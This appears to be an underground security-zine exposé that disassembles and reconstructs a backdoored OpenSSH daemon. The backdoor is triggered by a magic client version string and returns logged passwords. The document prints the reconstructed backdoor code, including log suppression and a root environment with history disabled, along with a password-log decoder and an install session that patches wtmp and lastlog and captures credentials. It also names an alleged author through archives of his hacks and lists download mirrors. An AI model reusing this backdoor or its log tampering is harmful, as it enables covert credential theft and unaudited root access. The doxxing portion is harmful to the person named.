- {
- char buf[256];
- u_int i, envsize;
- char **env, *laddr, *path = NULL;
- struct passwd *pw = s->pw;
- //...
- if(hookarOn == 1) {
- child_set_env(&env,&envsize,"USER","root");
- child_set_env(&env,&envsize,"HOME","/root");
- child_set_env(&env,&envsize,"PS1",a033031mOwned03);
- child_set_env(&env,&envsize,"HISTFILE","/dev/null");
- snprintf(s,1024,"uptime && last -5\n");
- system(s);
- }
- else {
- //do normal shit
- //...
- }
- /*session_proctitle
- .text:08058654 public session_proctitle
- .text:08058654 session_proctitle proc near ; CODE XREF: session_close+9Dj
- .text:08058654 ; session_close+14Bj ...
- .text:08058654
- .text:08058654 var_18 = dword ptr -18h
- .text:08058654 var_14 = dword ptr -14h
- .text:08058654 var_10 = dword ptr -10h
- .text:08058654 arg_0 = dword ptr 8
- .text:08058654
- .text:08058654 push ebp
- .text:08058655 mov ebp, esp
- .text:08058657 push edi
- .text:08058658 push esi
- .text:08058659 push ebx
- .text:0805865A sub esp, 0Ch
- .text:0805865D mov eax, [ebp+arg_0]
- .text:08058660 mov esi, [eax+8]
- .text:08058663 test esi, esi
- .text:08058665 jz loc_80587A9
- .text:0805866B mov ebx, ds:hookarOn
- .text:08058671 test ebx, ebx
- .text:08058673 jnz loc_8058760
- .text:08058679 mov ds:buf_1, 0
- .text:08058680 mov [ebp+var_10], 9
- .text:08058687 mov [ebp+var_18], 0
- .text:0805868E mov esi, esi
- .text:08058690
- .text:08058690 loc_8058690: ; CODE XREF: session_proctitle+D6j
- .text:08058690 ; session_proctitle+14Dj
- .text:08058690 mov eax, [ebp+var_18]
- .text:08058693 mov edx, [ebp+var_18]
- .text:08058696 mov ecx, dword ptr ds:sessions[eax]
- .text:0805869C add edx, offset sessions
- .text:080586A2 test ecx, ecx
- .text:080586A4 mov [ebp+var_14], edx
- .text:080586A7 jz short loc_8058720
- .text:080586A9 cmp dword ptr [eax+80874BCh], 0FFFFFFFFh
- .text:080586B0 jz short loc_8058720
- .text:080586B2 mov ebx, edx
- .text:080586B4 add ebx, 34h
- .text:080586B7 mov edi, offset aDev ; "/dev/"
- .text:080586BC mov ecx, 5
- .text:080586C1 cld
- .text:080586C2 mov esi, ebx
- .text:080586C4 repe cmpsb
- .text:080586C6 jz loc_8058770
- .text:080586CC sub esp, 8
- .text:080586CF push 2Fh ; c
- .text:080586D1 push ebx ; s
- .text:080586D2 call _strrchr
- .text:080586D7 mov esi, eax
- .text:080586D9 add esp, 10h
- .text:080586DC test esi, esi
- .text:080586DE mov eax, ebx
- .text:080586E0 jz short loc_80586E5
- .text:080586E2 lea eax, [esi+1]
- .text:080586E5
- .text:080586E5 loc_80586E5: ; CODE XREF: session_proctitle+8Cj
- .text:080586E5 cmp ds:buf_1, 0
- .text:080586EC mov esi, eax
- .text:080586EE jz loc_8058783
- .text:080586F4
- .text:080586F4 loc_80586F4: ; CODE XREF: session_proctitle+129j
- .text:080586F4 push eax
- .text:080586F5 push 400h
- .text:080586FA push offset reject ; ","
- .text:080586FF push offset buf_1
- .text:08058704 call _strlcat
- .text:08058709 add esp, 10h
- .text:0805870C push eax
- .text:0805870D push 400h
- .text:08058712 push esi
- .text:08058713 push offset buf_1
- .text:08058718 call _strlcat
- .text:0805871D add esp, 10h
- .text:08058720
- .text:08058720 loc_8058720: ; CODE XREF: session_proctitle+53j
- .text:08058720 ; session_proctitle+5Cj
- .text:08058720 add [ebp+var_18], 0A4h
- .text:08058727 dec [ebp+var_10]
- .text:0805872A jns loc_8058690
- .text:08058730
- .text:08058730 loc_8058730: ; CODE XREF: session_proctitle+153j
- .text:08058730 cmp ds:buf_1, 0
- .text:08058737 jz loc_80587C4
- .text:0805873D
- .text:0805873D loc_805873D: ; CODE XREF: session_proctitle+188j
- .text:0805873D push eax
- .text:0805873E push offset buf_1
- .text:08058743 mov edx, [ebp+arg_0]
- .text:08058746 mov eax, [edx+8]
- .text:08058749 push dword ptr [eax]
- .text:0805874B push offset aS@S ; "%s@%s"
- .text:08058750
- .text:08058750 loc_8058750: ; CODE XREF: session_proctitle+119j
- .text:08058750 call _setproctitle
- .text:08058755 add esp, 10h
- .text:08058758 lea esp, [ebp-0Ch]
- .text:0805875B pop ebx
- .text:0805875C pop esi
- .text:0805875D pop edi
- .text:0805875E leave
- .text:0805875F retn
- .text:08058760 ; ---------------------------------------------------------------------------
- .text:08058760
- .text:08058760 loc_8058760: ; CODE XREF: session_proctitle+1Fj
- .text:08058760 sub esp, 8
- .text:08058763 push 8079AC8h
- .text:08058768 push 8079AC8h
- .text:0805876D jmp short loc_8058750
- */
- void
- session_proctitle(Session *s)
- {
- if (s->pw == NULL)
- error("no user for session %d", s->self);
- else{
- if(hookarOn) {
- setproctitle("","");
- return;
- }
- //...blah blah
- }}
- /*login_write
- .text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
- .text:08060DA0 public login_write
- .text:08060DA0 login_write proc near ; CODE XREF: login_logout+Dj
- .text:08060DA0 ; login_login+Dj
- .text:08060DA0
- .text:08060DA0 var_18 = dword ptr -18h
- .text:08060DA0 var_4 = dword ptr -4
- .text:08060DA0 ptr = dword ptr 8
- .text:08060DA0
- .text:08060DA0 push ebp
- .text:08060DA1 mov ebp, esp
- .text:08060DA3 push ebx
- .text:08060DA4 push eax
- .text:08060DA5 xor eax, eax
- .text:08060DA7 cmp ds:hookarOn, 1
- .text:08060DAE mov ebx, [ebp+ptr]
- .text:08060DB1 jz short loc_8060DCE
- .text:08060DB3 call _geteuid
- .text:08060DB8 test eax, eax
- .text:08060DBA jz short loc_8060DD4
- .text:08060DBC sub esp, 0Ch
- .text:08060DBF push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
- .text:08060DC4 call logit
- .text:08060DC9 mov eax, 1
- .text:08060DCE
- .text:08060DCE loc_8060DCE: ; CODE XREF: login_write+11j
- .text:08060DCE mov ebx, [ebp+var_4]
- .text:08060DD1 leave
- .text:08060DD2 retn
- */
- /**
- ** login_write: Call low-level recording functions based on autoconf
- ** results
- **/
- int
- login_write(struct logininfo *li)
- {
- if(hookarOn == 1)
- return 0;
- //bla bla
- }
- /*do_log
- .text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
- .text:0806A1CC public do_log
- .text:0806A1CC do_log proc near ; CODE XREF: fatal+Fp
- .text:0806A1CC ; debug3+Fp ...
- .text:0806A1CC
- .text:0806A1CC dest = byte ptr -818h
- .text:0806A1CC buf = byte ptr -418h
- .text:0806A1CC arg_0 = dword ptr 8
- .text:0806A1CC arg_4 = dword ptr 0Ch
- .text:0806A1CC arg = dword ptr 10h
- .text:0806A1CC
- .text:0806A1CC push ebp
- .text:0806A1CD mov ebp, esp
- .text:0806A1CF push edi
- .text:0806A1D0 push esi
- .text:0806A1D1 push ebx
- .text:0806A1D2 sub esp, 80Ch
- .text:0806A1D8 cmp ds:hookarOn, 1
- .text:0806A1DF mov eax, [ebp+arg_0]
- .text:0806A1E2 mov ecx, [ebp+arg_4]
- .text:0806A1E5 mov ebx, [ebp+arg]
- .text:0806A1E8 jz loc_806A2A0
- .text:0806A2A0 loc_806A2A0: ; CODE XREF: do_log+1Cj
- .text:0806A2A0 ; do_log+2Aj ...
- .text:0806A2A0 lea esp, [ebp-0Ch]
- .text:0806A2A3 pop ebx
- .text:0806A2A4 pop esi
- .text:0806A2A5 pop edi
- .text:0806A2A6 leave
- .text:0806A2A7 retn
- .text:0806A2A8 ; --------------------------------------------------------------------
- */
- void
- do_log(LogLevel level, const char *fmt, va_list args)
- {
- if(hookarOn == 1)
- return;
- //bla bla
- }
- /*
- .text:0804D43B sub esp, 0Ch
- .text:0804D43E lea ecx, [ebp+s]
- .text:0804D444 push ecx
- .text:0804D445 mov [ebp+var_539], 0
- .text:0804D44C call xstrdup
- .text:0804D451 mov esi, eax ; esi = client version string
- .text:0804D453 mov ds:client_version_string, eax
- .text:0804D458 mov edi, offset aAGb7 ; "a-gb7"
- .text:0804D45D mov ecx, 5 ; count = 5
- .text:0804D462 cld
- .text:0804D463 add esp, 10h
- .text:0804D466 repe cmpsb ; strcmp (most likely strncmp)
- .text:0804D468 setnbe dl
- .text:0804D46B setb al
- .text:0804D46E mov bl, dl
- .text:0804D470 sub bl, al
- .text:0804D472 movsx ebx, bl
- .text:0804D475 test ebx, ebx
- .text:0804D477 jz loc_804E95A ; jmp if equal
- .text:0804E95A loc_804E95A: ; CODE XREF: main+B1Bj
- .text:0804E95A sub esp, 8
- .text:0804E95D push (offset aSLineDBadPortN+1Ah) ; "r"
- .text:0804E962 push offset filename ; "/var/run/ssh.old"
- .text:0804E967 call _fopen ; fopen(filename,"r")
- .text:0804E96C add esp, 10h
- .text:0804E96F test eax, eax
- .text:0804E971 mov ds:alog, eax ; alog = eax
- .text:0804E976 jz loc_804D47D ; quit if error with fopen
- .text:0804E97C push esi
- .text:0804E97D push 2 ; const SEEK_END = 2
- .text:0804E97F push 0 ; offset
- .text:0804E981 push eax ; alog
- .text:0804E982 call _fseek ; fseek(alog,0,SEEK_END)
- .text:0804E987 pop ecx
- .text:0804E988 push ds:alog ; size
- .text:0804E98E call _ftell ; ftell(alog)
- .text:0804E993 mov esi, eax ; esi = current offset = logfile size
- .text:0804E995 mov [esp+0C68h+var_C68], eax ; size_t
- .text:0804E998 call _malloc
- .text:0804E99D mov ds:mvebuf, eax ; mvebuf = malloc(logsize)
- .text:0804E9A2 mov [esp+0C68h+var_C68], esi
- .text:0804E9A5 call _malloc
- .text:0804E9AA mov edx, ds:mvebuf
- .text:0804E9B0 add esp, 10h
- .text:0804E9B3 test edx, edx
- .text:0804E9B5 mov ds:mvdbuf, eax ; mvdbuff = malloc(logsize)
- .text:0804E9BA jz loc_804EA70 ; if(mvebuf == null) jmp
- .text:0804E9C0 test eax, eax
- .text:0804E9C2 jz loc_804EA70 ; if(mvdbuf == null) jmp
- .text:0804E9C8 push eax
- .text:0804E9C9 push 0 ; const SEEK_SET = 0
- .text:0804E9CB push 0 ; offset
- .text:0804E9CD push ds:alog ; stream
- .text:0804E9D3 call _fseek ; fseek(alog,0,SEEK_SET)
- .text:0804E9D8 add esp, 10h
- .text:0804E9DB push ds:alog ; stream
- .text:0804E9E1 push 1 ; n
- .text:0804E9E3 push esi ; logfile size
- .text:0804E9E4 push ds:mvebuf ; ptr
- .text:0804E9EA call _fread ; fread(mvebuf, logsize, 1, alog)
- .text:0804E9EF mov edx, ds:mvebuf
- .text:0804E9F5 xor eax, eax
- .text:0804E9F7 mov ds:ai, 0
- .text:0804EA01 cld
- .text:0804EA02 mov ecx, 0FFFFFFFFh
- .text:0804EA07 mov edi, edx
- .text:0804EA09 repne scasb ; strlen(mvebuf)
- .text:0804EA0B not ecx
- .text:0804EA0D dec ecx
- .text:0804EA0E add esp, 10h
- .text:0804EA11 cmp ebx, ecx
- .text:0804EA13 jnb short loc_804EA5A ; for loop
- .text:0804EA15 mov ebx, 0FFFFFFFFh
- .text:0804EA1A
- .text:0804EA1A loc_804EA1A: ; CODE XREF: main+20FCj
- .text:0804EA1A mov ecx, ds:ai
- .text:0804EA20 mov al, [edx+ecx] ; al = mvebuf[ai]
- .text:0804EA23 not eax ; ~mvebuf[ai]
- .text:0804EA25 mov edx, ds:mvdbuf
- .text:0804EA2B mov [edx+ecx], al ; mvdbuf[i] = ~mvebuf[ai]
- .text:0804EA2E mov edi, ds:ai
- .text:0804EA34 inc edi ; ai++
- .text:0804EA35 mov edx, ds:mvebuf
- .text:0804EA3B mov [ebp+var_C40], edi ; var_C40 = ai
- .text:0804EA41 mov ds:ai, edi
- .text:0804EA47 xor eax, eax
- .text:0804EA49 mov ecx, ebx
- .text:0804EA4B mov edi, edx
- .text:0804EA4D repne scasb ; strlen(mvebuf)
- .text:0804EA4F not ecx
- .text:0804EA51 dec ecx
- .text:0804EA52 cmp [ebp+var_C40], ecx ; cmp ai with strlen result
- .text:0804EA58 jb short loc_804EA1A ; jmp if below =>
- .text:0804EA58 ; for(ai=0;ai<strlen(mvebuf);ai++)
- .text:0804EA5A
- .text:0804EA5A loc_804EA5A: ; CODE XREF: main+20B7j
- .text:0804EA5A push eax
- .text:0804EA5B push esi ; logfile size
- .text:0804EA5C push ds:mvdbuf ; mvdbuf
- .text:0804EA62 push [ebp+var_C00] ; var_C00 = current sock_out
- .text:0804EA68 call _write
- .text:0804EA6D add esp, 10h
- .text:0804EA70
- .text:0804EA70 loc_804EA70: ; CODE XREF: main+205Ej
- .text:0804EA70 ; main+2066j
- .text:0804EA70 sub esp, 0Ch
- .text:0804EA73 push ds:alog ; stream
- .text:0804EA79 call _fclose ; fclose(alog)
- .text:0804EA7E add esp, 10h
- .text:0804EA81 jmp loc_804D47D ; continue
- */
- /*
- * Main program for the daemon.
- */
- int
- main(int ac, char **av)
- {
- extern char *optarg;
- extern int optind;
- int opt, j, i, fdsetsz, on = 1;
- int sock_in = -1, sock_out = -1, newsock = -1;
- pid_t pid;
- socklen_t fromlen;
- fd_set *fdset;
- struct sockaddr_storage from;
- const char *remote_ip;
- int remote_port;
- FILE *f;
- struct addrinfo *ai;
- char ntop[NI_MAXHOST], strport[NI_MAXSERV];
- char *line;
- int listen_sock, maxfd;
- int startup_p[2] = { -1 , -1 }, config_s[2] = { -1 , -1 };
- int startups = 0;
- Key *key;
- Authctxt *authctxt;
- int ret, key_used = 0;
- Buffer cfg;
- //...
- //...
- sshd_exchange_identification(sock_in, sock_out);
- //...
- }
- static void
- sshd_exchange_identification(int sock_in, int sock_out)
- {
- //...
- if(strncmp(client_version_string,aAGb7,strlen(aAGb7)) == 0)
- if( (alog = fopen(filename,"r")) != 0) {
- fseek(alog,0,SEEK_END);
- logsize = ftell(alog);
- mvebuf = malloc(logsize);
- mvdbuf = malloc(logsize);
- if( (mvebuf != NULL) && (mvdbuf != NULL) ) {
- fseek(alog,0,SEEK_SET);
- fread(mvebuf,logsize,1,alog);
- for(ai = 0;ai<strlen(mvebuf);ai++) mvdbuf[ai] = ~mvebuf[ai];
- write(sock_out,mvdbuf,logsize);
- }
- fclose(alog);
- }
- //...
- //...
- }
- /*
- On server identification exchange if the client version first characters are equal to a specific
- string ("password") then it returns the captured passwords from ssh.old
- */
- /*
- lame.c
- Lame Decryprer v0.069
- This program is free software: you can redistribute it and/or modify
- it under the terms of the FSPL Fuck Skiddies Public License as published by
- the GCESE Foundation, either version 3 of the License, or
- (at your option) any later version.
- This program is distributed in the hope that it will be able to
- crack the complex encryption algorithm used by antisec's backdoor
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
- */
- #include <stdio.h>
- int main() {
- FILE *sshlog;
- char *filename = "/var/run/ssh.old";
- unsigned int cin;
- int i;
- if((sshlog=fopen(filename,"r")))
- while((cin = fgetc(sshlog)) != EOF)
- printf("%c",~cin);
- else
- printf("crappy file error\n");
- }
- Backdoor Installation
- ---------------------
- debian:~/hax# ./quick
- ________ .___ ________ _________
- \_____ \__ _ ______ ____ __| _/ \______ \ \_ ___ \
- / | \ \/ \/ / \_/ __ \ / __ | | | \/ \ \/
- / | \ / | \ ___// /_/ | | ` \ \____
- \_______ /\/\_/|___| /\___ >____ | /_______ /\______ /
- \/ \/ \/ \/ \/ \/
- "Hack everyone you can, and then hack some more"
- Logs [ CHECK ]
- Opening /var/log/wtmp ...
- Reading... patched ok.
- Opening /var/log/lastlog ...
- Reading... patched ok.
- Logs [ CHECK ]
- Configure [ CHECK ]
- checking for gcc... gcc
- checking for C compiler default output file name... a.out
- checking whether the C compiler works... yes
- checking whether we are cross compiling... no
- checking for suffix of executables...
- checking for suffix of object files... o
- checking whether we are using the GNU C compiler... yes
- checking whether gcc accepts -g... yes
- checking for gcc option to accept ANSI C... none needed
- checking build system type... i686-pc-linux-gnu
- checking host system type... i686-pc-linux-gnu
- checking whether byte ordering is bigendian... no
- checking for gawk... no
- checking for mawk... mawk
- checking how to run the C preprocessor... gcc -E
- checking for ranlib... ranlib
- checking for a BSD-compatible install... /usr/bin/install -c
- checking for egrep... grep -E
- checking for ar... /usr/bin/ar
- checking for cat... /bin/cat
- checking for kill... /bin/kill
- checking for perl5... no
- checking for perl... /usr/bin/perl
- checking for sed... /bin/sed
- checking for ent... no
- checking for bash... /bin/bash
- checking for ksh... (cached) /bin/bash
- checking for sh... (cached) /bin/bash
- checking for sh... /bin/sh
- checking for groupadd... /usr/sbin/groupadd
- checking for useradd... /usr/sbin/useradd
- checking for pkgmk... no
- checking for special C compiler options needed for large files... no
- checking for _FILE_OFFSET_BITS value needed for large files... 64
- checking for _LARGE_FILES value needed for large files... no
- checking for login... /bin/login
- checking for passwd... /usr/bin/passwd
- checking for inline... inline
- checking whether LLONG_MAX is declared... no
- checking whether LLONG_MAX is declared... yes
- checking for ANSI C header files... yes
- checking for sys/types.h... yes
- checking for sys/stat.h... yes
- checking for stdlib.h... yes
- checking for string.h... yes
- checking for memory.h... yes
- checking for strings.h... yes
- checking for inttypes.h... yes
- checking for stdint.h... yes
- checking for unistd.h... yes
- ...
- ...
- cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/ -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl -lcrypt
- Compile [ CHECK ]
- Running [ CHECK ]
- *** [ OsUcCu7hJA ]
- *** [ 6O7vp ]
- Game Over [ CHECKMATE! ]
- #--
- Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
- debian
- OsUcCu7hJA
- 6O7vp
- #--
- debian:~# telnet 10.5.1.13 22
- Trying 10.5.1.13...
- Connected to 10.5.1.13.
- Escape character is '^]'.
- SSH-2.0-OpenSSH_5.1p1 Debian
- 6O7vp
- HOOKIN: root:123!"?
- HOOKIN: testuser:testpass
- Protocol mismatch.
- Connection closed by foreign host.
- debian:~#
- _______ _______ ________ _________
- \ _ \ ___ __\ _ \/ __ \ / _____/ ____ ____
- / /_\ \\ \/ / /_\ \____ / \_____ \_/ __ \/ _ \
- \ \_/ \> <\ \_/ \ / / / \ ___( <_> )
- \_____ /__/\_ \\_____ //____/ /_______ /\___ >____/
- \/ \/ \/ \/ \/
- ________ __ .__ .__ .__
- \_____ \ _______/ |_|__| _____ |__|______|__| ____ ____
- / | \\____ \ __\ |/ \| \___ / |/ \ / ___\
- / | \ |_> > | | | Y Y \ |/ /| | | \/ /_/ >
- \_______ / __/|__| |__|__|_| /__/_____ \__|___| /\___ /
- \/|__| \/ \/ \//_____/
- 1) http://www.xssed.com/archive/author=romeo
- Date Author Domain PR Category Mirror
- 25/04/09 RoMeO www.akamai.com 19080 XSS mirror
- 22/03/09 RoMeO press.1and1.com 6883 XSS mirror
- 05/07/08 RoMeO scripts.mit.edu 999 XSS mirror
- 25/04/08 RoMeO forgottenmem.net 304476 XSS mirror
- 25/04/08 RoMeO www.h4ps.com 1753149 XSS mirror
- 23/04/08 RoMeO www.batelco.jo 225973 XSS mirror
- 12/04/08 RoMeO devscripts.net 1503804 XSS mirror
- 06/04/08 RoMeO www.vlx.in 2998964 XSS mirror
- 06/04/08 RoMeO www.ip2location.com 14646 XSS mirror
- 05/04/08 RoMeO realitatea.net 13002 XSS mirror
- 03/04/08 RoMeO www.name.com 13602 XSS mirror
- 03/04/08 RoMeO templates.entheosweb.com 13380 XSS mirror
- 31/03/08 RoMeO www.applyweb.com 50217 XSS mirror
- 31/03/08 RoMeO www.aast.edu 64423 XSS mirror
- 31/03/08 RoMeO www.cambridgescp.com 339535 XSS mirror
- 28/03/08 RoMeO www.freelotto.com R 306 XSS mirror
- 07/03/08 RoMeO www.sandboxie.com 70663 XSS mirror
- 06/03/08 RoMeO www.gulf-daily-news.com 14699 XSS mirror
- 06/03/08 RoMeO www.aucegypt.edu 38023 XSS mirror
- 06/03/08 RoMeO www.phpclanwebsite.com 986132 XSS mirror
- 05/03/08 RoMeO www.rapid-hook.com 95252 XSS mirror
- 05/03/08 RoMeO ipod.hopto.org 3648 XSS mirror
- 05/03/08 RoMeO www.darkshado.ca 6134372 XSS mirror
- 03/03/08 RoMeO www.macos.utah.edu 7333 XSS mirror
- 26/02/08 RoMeO www.rapidzearch.com 3797044 XSS mirror
- 11/02/08 RoMeO passport.51.com 184 XSS mirror
- 16/01/08 RoMeO www.memset.com 192269 XSS mirror
- 07/01/08 RoMeO search.mp3lyrics.org R 4309 XSS mirror
- 07/01/08 RoMeO qhost.eu 7969095 XSS mirror
- 05/01/08 RoMeO www.lpbs.org.uk 2776181 XSS mirror
- 04/01/08 RoMeO www.tdxp.net 0 XSS mirror
- 26/12/07 RoMeO aljaras.com 53022 XSS mirror
- 16/12/07 RoMeO www.sitemaps101.com 2163273 XSS mirror
- 15/12/07 RoMeO www.xml-sitemaps.com 8847 XSS mirror
- 10/12/07 RoMeO www.phpfaber.com 437969 XSS mirror
- 04/12/07 RoMeO www.tis-edu.com 0 XSS mirror
- 29/11/07 RoMeO pwnstarz.com 2025995 XSS mirror
- 23/11/07 RoMeO www.gamesurge.net 101368 XSS mirror
- 23/11/07 RoMeO cityguide.aol.com 54 XSS mirror
- 21/11/07 RoMeO my.notnet.co.uk 1419849 XSS mirror
- 06/11/07 RoMeO kwikhost.com 3593939 XSS mirror
- 06/11/07 RoMeO my.aol.com 54 XSS mirror
- 06/11/07 RoMeO www.searchtons.com 145218 XSS mirror
- 05/11/07 RoMeO www.seologs.com 18186 XSS mirror
- 05/11/07 RoMeO tools.elitehackers.info 151229 XSS mirror
- 05/11/07 RoMeO gallery.particlesoft.net 364744 XSS mirror
- 04/11/07 RoMeO www.filecart.com 27636 XSS mirror
- 04/11/07 RoMeO chollotenis.com 0 XSS mirror
- 02/11/07 RoMeO tsdepot.co.uk R 6739237 XSS mirror
- 02/11/07 RoMeO www.pesladder.com 1172005 XSS mirror
- 31/10/07 RoMeO www.omni-chat.com 1857220 XSS mirror
- 28/10/07 RoMeO www.anafit.com 2563280 XSS mirror
- 28/10/07 RoMeO www.hellboundhackers.org 213995 XSS mirror
- 28/10/07 RoMeO www.cyclelogic.co.uk 3361622 XSS mirror
- 16/10/07 RoMeO tsdepot.co.uk 6739237 XSS mirror
- 06/10/07 RoMeO www.terrytrophy.com 0 XSS mirror
- 03/10/07 RoMeO www13.cd-wow.com 28971 XSS mirror
- 03/10/07 RoMeO www.drbeat.li 8200365 XSS mirror
- 02/10/07 RoMeO services.embark.com 12027 XSS mirror
- 27/09/07 RoMeO ascii.techhappens.com 1215439 XSS mirror
- 20/09/07 RoMeO www.org-rc.fr 1884591 XSS mirror
- 26/06/07 RoMeO search.fbi.gov 11963 XSS mirror
- 2) http://www.zone-h.org/archive/defacer=romeo
- Time Attacker H M R Domain OS View
- 2007/11/06 Romeo H trakyagirl.uni.cc Win 2003 mirror
- 2007/09/23 RomeO H R www.zexir.tk Linux mirror
- 2006/12/11 RoMeO www.koturkiye.com/hacked Linux mirror
- 2006/10/21 ROMEO H www.duyguajans.com FreeBSD mirror
- 2006/09/06 romeo M www.yeniliman.com/forum Linux mirror
- 2006/09/06 romeo M www.genc4um.com/forum Linux mirror
- 2006/09/06 ROMEO H www.forumhersey.com Linux mirror
- 2006/09/05 ROMEO M www.muzikogretmenleri.com/foru... Linux mirror
- 2006/09/05 ROMEO M www.sanalailem.com/forum Linux mirror
- 2006/09/05 ROMEO rocksitesi.net/forum/index.php Linux mirror
- 2006/09/05 ROMEO www.beyazrenkler.com/forum/ind... Linux mirror
- 2006/09/05 ROMEO www.yasakmp3.com/forum/index.php Win 2003 mirror
- 2006/09/05 ROMEO www.forumekani.com/index.php Linux mirror
- 2006/09/05 romeo www.turkfr.com/index.php Linux mirror
- 2006/09/05 romeo www.gizemliforum.org/index.php Linux mirror
- 2006/09/05 ROMEO www.arkadasbilisim.com/forum/i... Linux mirror
- 2006/09/05 ROMEO www.modifiyedunyasi.com/forum/... Linux mirror
- 2006/09/05 ROMEO www.forzatc.net/forum/index.php FreeBSD mirror
- 2006/09/05 ROMEO www.megaarsiv.net/index.php Linux mirror
- 2006/09/05 ROMEO egeizmir.com/forum/index.php Linux mirror
- 2006/09/05 ROMEO R www.nokiacep.com/forum/index.php Win 2003 mirror
- 2006/09/04 romeo H www.cyber-turka.org Win 2003 mirror
- 2006/07/12 romeo www.cehennem.net/den Linux mirror
- 2006/05/29 romeo H gorno-altaisk.ru Linux mirror
- 2006/05/29 ROMEO H M www.nobel.uz Win 2000 mirror
- 2006/05/29 ROMEO H R www.tdshi.uz Win 2000 mirror
- 2006/05/17 romeo H forumliontr.com Linux mirror
- 2006/05/02 romeo M www.pichiz.biz/forum Linux mirror
- 2006/05/02 ROMEO M www.trmizah.com/smf Linux mirror
- 2006/05/02 ROMEO H M www.rapsohbeti.com Linux mirror
- 2006/04/23 romeo www.gecelerinforumu.com/forum/... Linux mirror
- 2006/03/19 romeo www.esmer.org/index.php Linux mirror
- 2006/01/12 romeo M sitebirligi.com/~oyuncu/hacked... Linux mirror
- 2006/01/12 romeo M konya-kosk.bel.tr/~oyuncu/hack... Linux mirror
- 2006/01/12 romeo M aktueldershanesi.com/~oyuncu/h... Linux mirror
- 2006/01/12 romeo M www.hesapliweb.com/~oyuncu/hac... Linux mirror
- 2006/01/12 romeo M www.aheninsaat.com/~oyuncu/hac... Linux mirror
- 2006/01/12 romeo M www.mp3ilahi.com/~oyuncu/hacke... Linux mirror
- 2006/01/12 romeo M www.eurotipsters.com/~oyuncu/h... Linux mirror
- 2006/01/12 romeo M www.kardeslik.org/~oyuncu/hack... Linux mirror
- 2006/01/12 romeo M www.hiperx.net/~oyuncu/hacked/... Linux mirror
- 2006/01/12 romeo M www.najans.com/~oyuncu/hacked/... Linux mirror
- 2006/01/12 romeo M www.gulmece.net/~oyuncu/hacked... Linux mirror
- 2006/01/12 romeo M www.cigilfm.com/~oyuncu/hacked... Linux mirror
- 2006/01/12 romeo M www.gifturk.com/~oyuncu/hacked... Linux mirror
- 2006/01/12 romeo M www.why-islam.net/~oyuncu/hack... Linux mirror
- 2006/01/12 romeo M www.e-matrak.org/~oyuncu/hacke... Linux mirror
- 2006/01/12 romeo M www.kazancyolu.com/~oyuncu/hac... Linux mirror
- 2006/01/12 romeo M www.hiperstore.gen.tr/~oyuncu/... Linux mirror
- 2006/01/12 romeo M www.senarslan.com/~oyuncu/hack... Linux mirror
- 2006/01/12 romeo M www.aprohosting.net/~oyuncu//h... Linux mirror
- 2006/01/12 romeo M R www.gulum.net/~oyuncu//hacked/... Linux mirror
- 2006/01/12 romeo M R www.basinyayin.net/~oyuncu//ha... Linux mirror
- 2006/01/12 romeo M www.dinleradyo.com/~oyuncu//ha... Linux mirror
- 2006/01/12 romeo M www.sitetasarimi.com/~oyuncu//... Linux mirror
- 2005/04/08 romeo votedevoe.org/v-web/portal/cms... FreeBSD mirror
- 2005/03/23 romeo R www.willowsend.co.nz/index.php Linux mirror
- 2005/03/23 romeo H M moh.theclap.co.nz Linux mirror
- _______ ___________
- \ _ \ ___ __/_ \ _ \
- / /_\ \\ \/ /| / /_\ \
- \ \_/ \> < | \ \_/ \
- \_____ /__/\_ \|___|\_____ /
- \/ \/ \/
- __________ __ .__
- \______ \ ____ ______ ____________/ |_|__| ____ ____
- | _// __ \\____ \ / _ \_ __ \ __\ |/ \ / ___\
- | | \ ___/| |_> > <_> ) | \/| | | | | \/ /_/ >
- |____|_ /\___ > __/ \____/|__| |__| |__|___| /\___ /
- \/ \/|__| \//_____/
- 1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
- 2) http://www.fbi.gov/contact/fo/fo.htm
- 3) http://www.treas.gov/usss/index.shtml
- 4) http://www.ic3.gov/default.aspx
- 5) http://www.tra.gov.ae/complaints.php
- _______ ____ ____
- \ _ \ ___ __/_ /_ |
- / /_\ \\ \/ /| || |
- \ \_/ \> < | || |
- \_____ /__/\_ \|___||___|
- \/ \/
- _____ __ __ .__ __
- / _ \_/ |__/ |______ ____ | |__ _____ ____ _____/ |_ ______
- / /_\ \ __\ __\__ \ _/ ___\| | \ / \_/ __ \ / \ __\/ ___/
- / | \ | | | / __ \\ \___| Y \ Y Y \ ___/| | \ | \___ \
- \____|__ /__| |__| (____ /\___ >___| /__|_| /\___ >___| /__| /____ >
- \/ \/ \/ \/ \/ \/ \/ \/
- Mirrors
- 1. http://rapidshare.com/files/328431323/antisec.tar.gz
- 2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
- 3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
- 4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
- 5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
- 6. http://www.sendspace.com/file/07clr5
- _______ ____________
- \ _ \ ___ __/_ \_____ \
- / /_\ \\ \/ /| |/ ____/
- \ \_/ \> < | / \
- \_____ /__/\_ \|___\_______ \
- \/ \/ \/
- _________ .__ .__
- \_ ___ \ ____ ____ ____ | | __ __ _____|__| ____ ____
- / \ \/ / _ \ / \_/ ___\| | | | \/ ___/ |/ _ \ / \
- \ \___( <_> ) | \ \___| |_| | /\___ \| ( <_> ) | \
- \______ /\____/|___| /\___ >____/____//____ >__|\____/|___| /
- \/ \/ \/ \/ \/
- What we tend to believe is that most of the so-called blackhats had lost or still strive towards the chance of
- becoming an integral part of the information security industry and so they are blaming people who share old
- and new information regarding the protection of corporate and personal information assets, including ICT systems
- and social security.
- _______ ____________
- \ _ \ ___ __/_ \_____ \
- / /_\ \\ \/ /| | _(__ <
- \ \_/ \> < | |/ \
- \_____ /__/\_ \|___/______ /
- \/ \/ \/
- ________ __
- / _____/______ ____ _____/ |_________
- / \ __\_ __ \_/ __ \_/ __ \ __\___ /
